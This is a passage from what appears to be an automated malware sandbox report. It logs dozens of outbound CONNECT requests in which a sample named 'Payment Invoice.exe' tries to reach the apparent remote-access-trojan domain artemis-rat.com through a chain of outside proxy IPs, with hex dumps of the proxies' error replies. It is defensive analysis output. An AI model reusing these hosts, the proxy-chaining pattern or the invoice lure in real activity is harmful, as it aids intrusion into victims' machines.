                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><t


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                864192.168.2.4525715.61.33.234807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.041534901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                865192.168.2.450837192.111.134.1041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.057749987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                866192.168.2.45259672.210.252.13741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.066277027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                867192.168.2.452527183.215.23.24290917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.078907013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.449743032 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.1
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                868192.168.2.45261598.178.72.21109197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.083378077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                869192.168.2.4525758.142.3.14533067076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.090812922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                870192.168.2.451983186.150.207.20780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.094019890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.407807112 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                871192.168.2.45266343.153.58.2044437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.097212076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                872192.168.2.45266443.153.58.2044437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.098437071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                873192.168.2.45266643.153.58.2044437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.099155903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                874192.168.2.45266843.153.58.2044437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.100516081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                875192.168.2.452544222.220.102.15980007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.103480101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.495167971 CET705INHTTP/1.1 502 Bad Gateway
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 556
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                876192.168.2.452614211.222.252.18781977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.110027075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                877192.168.2.452610218.252.244.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.113801003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                878192.168.2.45045251.158.77.220163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.118686914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.120781898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.124049902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.323940039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.323860884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.323751926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.323683977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.595799923 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                879192.168.2.451877122.116.150.290007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.126930952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                880192.168.2.451690124.160.118.18380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.144773960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.630911112 CET323INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.8.1
                                                                Date: Tue, 12 Mar 2024 03:36:24 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 172
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                881192.168.2.451968128.199.165.63335747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.161714077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                882192.168.2.452648159.65.77.16885857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.191257954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                883192.168.2.450759172.93.111.87158057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.194734097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.241739988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386498928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.386487007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.439595938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.589260101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                884192.168.2.452659104.25.231.184807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.198092937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.352303982 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                885192.168.2.452099148.66.130.53319077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.251672029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                886192.168.2.45263852.151.210.20490007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.252777100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                887192.168.2.452339174.77.111.198495477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.252934933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                888192.168.2.45211172.206.181.105649357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.252939939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                889192.168.2.452630221.153.92.39807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.253175020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                890192.168.2.450407220.194.189.14431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.253185987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
